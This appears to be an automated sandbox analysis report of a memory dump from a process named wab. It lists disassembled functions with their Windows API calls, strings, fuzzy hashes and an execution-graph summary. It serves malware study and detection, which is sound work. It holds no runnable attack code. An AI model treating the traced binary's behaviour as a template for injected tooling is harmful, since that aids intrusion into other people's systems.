                                                                                  • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                  • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00402FD7
                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                  • strlen.MSVCRT ref: 00403006
                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 2754987064-0
                                                                                  • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                  • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                  • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                  • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                    • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                    • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                  • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                  • String ID:
                                                                                  • API String ID: 764393265-0
                                                                                  • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                  • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                  • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                  • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$System$File$LocalSpecific
                                                                                  • String ID:
                                                                                  • API String ID: 979780441-0
                                                                                  • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                  • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                  • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                  • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memcpy.MSVCRT ref: 004134E0
                                                                                  • memcpy.MSVCRT ref: 004134F2
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$DialogHandleModuleParam
                                                                                  • String ID:
                                                                                  • API String ID: 1386444988-0
                                                                                  • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                  • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                  • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                  • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@
                                                                                  • String ID:
                                                                                  • API String ID: 613200358-0
                                                                                  • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                  • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                  • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                  • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: InvalidateMessageRectSend
                                                                                  • String ID: d=E
                                                                                  • API String ID: 909852535-3703654223
                                                                                  • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                  • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                  • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                  • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • wcschr.MSVCRT ref: 0040F79E
                                                                                  • wcschr.MSVCRT ref: 0040F7AC
                                                                                    • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                    • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: wcschr$memcpywcslen
                                                                                  • String ID: "
                                                                                  • API String ID: 1983396471-123907689
                                                                                  • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                  • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                  • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                  • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                  • _memicmp.MSVCRT ref: 0040C00D
                                                                                  • memcpy.MSVCRT ref: 0040C024
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FilePointer_memicmpmemcpy
                                                                                  • String ID: URL
                                                                                  • API String ID: 2108176848-3574463123
                                                                                  • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                  • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                  • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                  • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _snwprintfmemcpy
                                                                                  • String ID: %2.2X
                                                                                  • API String ID: 2789212964-323797159
                                                                                  • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                  • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                  • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                  • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _snwprintf
                                                                                  • String ID: %%-%d.%ds
                                                                                  • API String ID: 3988819677-2008345750
                                                                                  • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                  • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                  • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                  • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040E770
                                                                                  • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendmemset
                                                                                  • String ID: F^@
                                                                                  • API String ID: 568519121-3652327722
                                                                                  • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                  • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                  • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                  • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: PlacementWindowmemset
                                                                                  • String ID: WinPos
                                                                                  • API String ID: 4036792311-2823255486
                                                                                  • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                  • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                  • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                  • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                  • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                  • wcscat.MSVCRT ref: 0040DCFF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileModuleNamewcscatwcsrchr
                                                                                  • String ID: _lng.ini
                                                                                  • API String ID: 383090722-1948609170
                                                                                  • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                  • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                  • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                  • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                  • API String ID: 2773794195-880857682
                                                                                  • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                  • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                  • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                  • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$memset
                                                                                  • String ID:
                                                                                  • API String ID: 438689982-0
                                                                                  • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                  • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                  • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                  • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@$memset
                                                                                  • String ID:
                                                                                  • API String ID: 1860491036-0
                                                                                  • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                  • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                  • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                  • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memcmp.MSVCRT ref: 00408AF3
                                                                                    • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                    • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                                    • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                                                  • memcmp.MSVCRT ref: 00408B2B
                                                                                  • memcmp.MSVCRT ref: 00408B5C
                                                                                  • memcpy.MSVCRT ref: 00408B79
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcmp$memcpy
                                                                                  • String ID:
                                                                                  • API String ID: 231171946-0
                                                                                  • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                  • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                  • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                  • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: wcslen$wcscat$wcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 1961120804-0
                                                                                  • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                  • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                  • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                  • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage:2.4%
                                                                                  Dynamic/Decrypted Code Coverage:20.4%
                                                                                  Signature Coverage:0.5%
                                                                                  Total number of Nodes:849
                                                                                  Total number of Limit Nodes:16
                                                                                  execution_graph 34109 40fc40 70 API calls 34282 403640 21 API calls 34110 427fa4 42 API calls 34283 412e43 _endthreadex 34284 425115 76 API calls __fprintf_l 34285 43fe40 133 API calls 34113 425115 83 API calls __fprintf_l 34114 401445 memcpy memcpy DialogBoxParamA 34115 440c40 34 API calls 33238 444c4a 33257 444e38 33238->33257 33240 444c56 GetModuleHandleA 33241 444c68 __set_app_type __p__fmode __p__commode 33240->33241 33243 444cfa 33241->33243 33244 444d02 __setusermatherr 33243->33244 33245 444d0e 33243->33245 33244->33245 33258 444e22 _controlfp 33245->33258 33247 444d13 _initterm __getmainargs _initterm 33248 444d6a GetStartupInfoA 33247->33248 33250 444d9e GetModuleHandleA 33248->33250 33259 40cf44 33250->33259 33254 444dcf _cexit 33256 444e04 33254->33256 33255 444dc8 exit 33255->33254 33257->33240 33258->33247 33310 404a99 LoadLibraryA 33259->33310 33261 40cf60 33296 40cf64 33261->33296 33317 410d0e 33261->33317 33263 40cf6f 33321 40ccd7 ??2@YAPAXI 33263->33321 33265 40cf9b 33335 407cbc 33265->33335 33270 40cfc4 33353 409825 memset 33270->33353 33271 40cfd8 33358 4096f4 memset 33271->33358 33276 40d181 ??3@YAXPAX 33278 40d1b3 33276->33278 33279 40d19f DeleteObject 33276->33279 33277 407e30 _strcmpi 33280 40cfee 33277->33280 33382 407948 ??3@YAXPAX ??3@YAXPAX 33278->33382 33279->33278 33282 40cff2 RegDeleteKeyA 33280->33282 33283 40d007 EnumResourceTypesA 33280->33283 33282->33276 33285 40d047 33283->33285 33286 40d02f MessageBoxA 33283->33286 33284 40d1c4 33383 4080d4 ??3@YAXPAX 33284->33383 33288 40d0a0 CoInitialize 33285->33288 33363 40ce70 33285->33363 33286->33276 33380 40cc26 strncat memset RegisterClassA CreateWindowExA 33288->33380 33290 40d1cd 33384 407948 ??3@YAXPAX ??3@YAXPAX 33290->33384 33292 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33381 40c256 PostMessageA 33292->33381 33296->33254 33296->33255 33297 40d061 ??3@YAXPAX 33297->33278 33300 40d084 DeleteObject 33297->33300 33298 40d09e 33298->33288 33300->33278 33302 40d0f9 GetMessageA 33303 40d17b 33302->33303 33304 40d10d 33302->33304 33303->33276 33305 40d113 TranslateAccelerator 33304->33305 33307 40d145 IsDialogMessage 33304->33307 33308 40d139 IsDialogMessage 33304->33308 33305->33304 33306 40d16d GetMessageA 33305->33306 33306->33303 33306->33305 33307->33306 33309 40d157 TranslateMessage DispatchMessageA 33307->33309 33308->33306 33308->33307 33309->33306 33311 404ac4 GetProcAddress 33310->33311 33313 404ae8 33310->33313 33312 404add FreeLibrary 33311->33312 33314 404ad4 33311->33314 33312->33313 33315 404b13 33313->33315 33316 404afc MessageBoxA 33313->33316 33314->33312 33315->33261 33316->33261 33318 410d17 LoadLibraryA 33317->33318 33319 410d3c 33317->33319 33318->33319 33320 410d2b GetProcAddress 33318->33320 33319->33263 33320->33319 33322 40cd08 ??2@YAPAXI 33321->33322 33324 40cd26 33322->33324 33325 40cd2d 33322->33325 33392 404025 6 API calls 33324->33392 33327 40cd66 33325->33327 33328 40cd59 DeleteObject 33325->33328 33385 407088 33327->33385 33328->33327 33330 40cd6b 33388 4019b5 33330->33388 33333 4019b5 strncat 33334 40cdbf _mbscpy 33333->33334 33334->33265 33394 407948 ??3@YAXPAX ??3@YAXPAX 33335->33394 33337 407e04 33395 407a55 33337->33395 33340 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33347 407cf7 33340->33347 33341 407ddc 33341->33337 33407 407a1f 33341->33407 33343 407d7a ??3@YAXPAX 33343->33347 33347->33337 33347->33340 33347->33341 33347->33343 33398 40796e 7 API calls 33347->33398 33399 406f30 33347->33399 33349 407e30 33350 407e38 33349->33350 33351 407e57 33349->33351 33350->33351 33352 407e41 _strcmpi 33350->33352 33351->33270 33351->33271 33352->33350 33352->33351 33413 4097ff 33353->33413 33355 409854 33418 409731 33355->33418 33359 4097ff 3 API calls 33358->33359 33360 409723 33359->33360 33438 40966c 33360->33438 33452 4023b2 33363->33452 33369 40ced3 33541 40cdda 7 API calls 33369->33541 33370 40cece 33373 40cf3f 33370->33373 33493 40c3d0 memset GetModuleFileNameA strrchr 33370->33493 33373->33297 33373->33298 33376 40ceed 33520 40affa 33376->33520 33380->33292 33381->33302 33382->33284 33383->33290 33384->33296 33393 406fc7 memset _mbscpy 33385->33393 33387 40709f CreateFontIndirectA 33387->33330 33389 4019e1 33388->33389 33390 4019c2 strncat 33389->33390 33391 4019e5 memset LoadIconA 33389->33391 33390->33389 33391->33333 33392->33325 33393->33387 33394->33347 33396 407a65 33395->33396 33397 407a5b ??3@YAXPAX 33395->33397 33396->33349 33397->33396 33398->33347 33400 406f37 malloc 33399->33400 33401 406f7d 33399->33401 33403 406f73 33400->33403 33404 406f58 33400->33404 33401->33347 33403->33347 33405 406f6c ??3@YAXPAX 33404->33405 33406 406f5c memcpy 33404->33406 33405->33403 33406->33405 33408 407a38 33407->33408 33409 407a2d ??3@YAXPAX 33407->33409 33410 406f30 3 API calls 33408->33410 33411 407a43 33409->33411 33410->33411 33412 40796e 7 API calls 33411->33412 33412->33337 33429 406f96 GetModuleFileNameA 33413->33429 33415 409805 strrchr 33416 409814 33415->33416 33417 409817 _mbscat 33415->33417 33416->33417 33417->33355 33430 44b090 33418->33430 33423 40930c 3 API calls 33424 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33423->33424 33425 4097c5 LoadStringA 33424->33425 33428 4097db 33425->33428 33427 4097f3 33427->33276 33428->33425 33428->33427 33437 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33428->33437 33429->33415 33431 40973e _mbscpy _mbscpy 33430->33431 33432 40930c 33431->33432 33433 44b090 33432->33433 33434 409319 memset GetPrivateProfileStringA 33433->33434 33435 409374 33434->33435 33436 409364 WritePrivateProfileStringA 33434->33436 33435->33423 33436->33435 33437->33428 33448 406f81 GetFileAttributesA 33438->33448 33440 409675 33441 4096ee 33440->33441 33442 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33440->33442 33441->33277 33449 409278 GetPrivateProfileStringA 33442->33449 33444 4096c9 33450 409278 GetPrivateProfileStringA 33444->33450 33446 4096da 33451 409278 GetPrivateProfileStringA 33446->33451 33448->33440 33449->33444 33450->33446 33451->33441 33543 409c1c 33452->33543 33455 401e69 memset 33582 410dbb 33455->33582 33458 401ec2 33612 4070e3 strlen _mbscat _mbscpy _mbscat 33458->33612 33459 401ed4 33597 406f81 GetFileAttributesA 33459->33597 33462 401ee6 strlen strlen 33464 401f15 33462->33464 33465 401f28 33462->33465 33613 4070e3 strlen _mbscat _mbscpy _mbscat 33464->33613 33598 406f81 GetFileAttributesA 33465->33598 33468 401f35 33599 401c31 33468->33599 33471 401f75 33611 410a9c RegOpenKeyExA 33471->33611 33473 401c31 7 API calls 33473->33471 33474 401f91 33475 402187 33474->33475 33476 401f9c memset 33474->33476 33478 402195 ExpandEnvironmentStringsA 33475->33478 33479 4021a8 _strcmpi 33475->33479 33614 410b62 RegEnumKeyExA 33476->33614 33623 406f81 GetFileAttributesA 33478->33623 33479->33369 33479->33370 33481 40217e 